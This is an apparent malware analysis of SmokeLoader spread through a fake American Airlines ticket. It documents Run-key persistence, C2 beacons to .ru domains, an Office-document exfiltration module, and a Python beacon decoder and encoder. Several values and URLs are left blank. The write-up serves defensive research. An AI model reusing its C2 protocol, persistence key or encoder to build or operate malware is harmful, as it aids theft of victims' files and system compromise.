American Airlines Ticket Attachment

Subject: Order#4532104

American Airlines

The sample contained a SmokeLoader payload within the attachment. It had the following properties:

File: Ticket_American_Airlines_ID3457-144.exe
MD5: 0b2b79189fd6e04a644c647cbebdd757
Size: 135,168 bytes
Path: C:\Documents and Settings\nightrover\Application Data\DD8F30.exe

The following registry value is created to ensure the file is started again at every user logon:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Microsoft Windows
“C:\Documents and Settings\nightrover\Application Data\DD8F30.exe”

The following network traffic is observed, related to SmokeLoader (all "smk=" values can be decoded by Base64-decoding them and then XORing each byte with 0x02):


Likely a connectivity test.

  • POST ofalaskas14[.]ru/wen/index.php

The infected host POSTs the following to the server

  • POST ofalaskas14[.]ru/wen/index.php

Data posted is ‘smk=AmFvZj9lZ3ZycG16ew==’, which decodes to ‘.cmd=getproxy’ (the leading ‘.’ stands for a 0x00 byte).
The response carries encoded data, likely the SOCKS proxy module available as an add-on for SmokeLoader.

  • POST ofalaskas14[.]ru/wen/index.php

Data posted is ‘smk=AmFvZj9lZ3ZxbWFpcSRubWVrbD9EQTtBNkZEMjM0MUYwOkc6MkMzRzFENTo2MDY2NjBBQTAxRkY6RDEyJHJtcHY/MTE0NjA=’, which decodes to ‘.cmd=getsocks&login=FC9C4DF0163D28E80A1E3F78424442CC23DD8F30&port=33642’.
The port value likely indicates the SOCKS proxy port. Note that the last six hex digits of the login value match the name of the dropped file, DD8F30.exe.

  • POST ofalaskas14[.]ru/wen/index.php

Data posted is ‘smk=AmFvZj9lZ3ZubWNmJG5tZWtsP0RBO0E2RkQyMzQxRjA6RzoyQzNHMUQ1OjYwNjY2MEFBMDFGRjpEMTIkcWduPzM7b2NwJHRncD83LDMkYGt2cT8yJGRrbGNuP21p’, which decodes to ‘.cmd=getload&login=FC9C4DF0163D28E80A1E3F78424442CC23DD8F30&sel=19mar&ver=5.1&bits=0&final=ok’.
The server returns ‘Smk6’, which indicates that there are 6 files for download.

  • POST tropic18854[.]ru/ddn/index.php

Data posted is ‘AmFvZj9lZ3ZubWNmJG5tZWtsP0RBO0E2RkQyMzQxRjA6RzoyQzNHMUQ1OjYwNjY2MEFBMDFGRjpEMTIkcWduPzM7b2NwJHRncD83LDMkYGt2cT8yJGRrbmc/cA==’ which decodes to
The server responds with a redirect whose Location header points at the first file to download. This is repeated for each of the 6 files, with the file= parameter incremented from 0 on each request.
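As an added example (not part of the original write-up), the following Python script implements the decoding scheme described above, Base64 followed by XOR of every byte with 0x02, and splits each beacon into its fields. The four smk= values are the ones quoted above; the POST bodies wrapped around them, the unrelated body used to show filtering, and all function names are constructed for illustration.

```python
import base64
import re
from urllib.parse import parse_qsl

XOR_KEY = 0x02  # single-byte key used by this sample, as described in the write-up

# smk= values quoted in the write-up above (ciphertext only, 'smk=' prefix stripped).
GETPROXY = "AmFvZj9lZ3ZycG16ew=="
GETSOCKS = ("AmFvZj9lZ3ZxbWFpcSRubWVrbD9EQTtBNkZEMjM0MUYwOkc6MkMzRzFENTo2MDY2"
            "NjBBQTAxRkY6RDEyJHJtcHY/MTE0NjA=")
GETLOAD = ("AmFvZj9lZ3ZubWNmJG5tZWtsP0RBO0E2RkQyMzQxRjA6RzoyQzNHMUQ1OjYwNjY2"
           "MEFBMDFGRjpEMTIkcWduPzM7b2NwJHRncD83LDMkYGt2cT8yJGRrbGNuP21p")
GETFILE = ("AmFvZj9lZ3ZubWNmJG5tZWtsP0RBO0E2RkQyMzQxRjA6RzoyQzNHMUQ1OjYwNjY2"
           "MEFBMDFGRjpEMTIkcWduPzM7b2NwJHRncD83LDMkYGt2cT8yJGRrbmc/cA==")


def decode_smk(value: str) -> bytes:
    """Reverse the sample's encoding: Base64-decode, then XOR every byte with 0x02."""
    return bytes(b ^ XOR_KEY for b in base64.b64decode(value))


def encode_smk(plain: bytes) -> str:
    """Inverse of decode_smk (XOR, then Base64), e.g. to build traffic for a C2 emulator."""
    return base64.b64encode(bytes(b ^ XOR_KEY for b in plain)).decode("ascii")


def parse_beacon(value: str) -> dict:
    """Decode one smk= value and split the query-string body into a dict of fields.

    The plaintext begins with a single 0x00 byte (0x02 XOR 0x02), which the
    write-up renders as '.'; it is checked and dropped here. A different leading
    byte means the key is wrong or this is not a smk= beacon.
    """
    plain = decode_smk(value)
    if plain[:1] != b"\x00":
        raise ValueError(f"unexpected leading byte {plain[:1]!r}")
    return dict(parse_qsl(plain[1:].decode("ascii"), keep_blank_values=True))


# Matches the smk parameter inside a URL-encoded POST body (constructed pattern).
SMK_RE = re.compile(r"(?:^|&)smk=([A-Za-z0-9+/=]+)")


def beacons_from_bodies(bodies):
    """Extract and decode every smk= beacon from a list of raw POST bodies.

    Bodies without an smk= parameter (unrelated traffic) are skipped, so this
    can be run over all POST bodies carved from a capture.
    """
    decoded = []
    for body in bodies:
        match = SMK_RE.search(body)
        if match:
            decoded.append(parse_beacon(match.group(1)))
    return decoded


# Constructed POST bodies (not taken from the original capture) that wrap the
# quoted values the way the infected host sends them, plus one unrelated body.
SAMPLE_BODIES = [
    "smk=" + GETPROXY,
    "smk=" + GETSOCKS,
    "smk=" + GETLOAD,
    "smk=" + GETFILE,
    "user=test&action=login",  # unrelated traffic, should be ignored
]

if __name__ == "__main__":
    for fields in beacons_from_bodies(SAMPLE_BODIES):
        print(fields)
```

Running the script prints the getproxy, getsocks and two getload beacons as dictionaries. Because every beacon starts with the constant plaintext "\x00cmd=g", all four ciphertexts on this page share the prefix "AmFvZj9l", so "smk=AmFvZj" in a POST body is a usable signature for traffic encoded with this key.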

One of the files SmokeLoader downloads is an Office document grabber. During our analysis we observed it searching for Office documents, archiving them as a ZIP file and uploading the archive to the server shown below:

It then uploads an archive of all the .XLS and .DOC files collected from the victim machine to – – group_id=1486090109 – password=nohifoaa

The following files were downloaded:


MD5: e7501c4a9d19135a6d6f357216289324
Size: 409,600 bytes
AV detection indicates that it is likely a rogue AV variant.


MD5: 864f1cf79e92631168797a7ed8cb7c99
Size: 631,808 bytes
AV detection indicates that it is likely a downloader/backdoor.

Observed network communications include the following:

  • /?s5e55k=%96%9B%A1%D0%D6%AA%91%94c%A4m%96%C8%C6kf%A2%98%AA%DA%AC%CFkjac%94%A8%A5%AC%99%9Df%5B%E2%E8%A2%E7%E5%CA%C4T%A8%9A%D5vf%95%9BjY%D7%A5%E0%B4%D8%D9f%88%84T%D0%D8%D1%B0v%9Dmx%9F%A8%AA%A1%B3%A2%BAtge%B4ny%99%A7%7Dk%A1%7B%B2%AC%B8%9Fjhuo%9A%95%DF%D8%A8%A2ee%9B%A2%95%A3%A0%A2%A4%5Ecb%A1ic%93%95ic%9B%5D%EF%B4%A3%9Bica%5E%9B%A6%91

Both these requests resulted in 301 Moved Permanently – Location: hxxp://

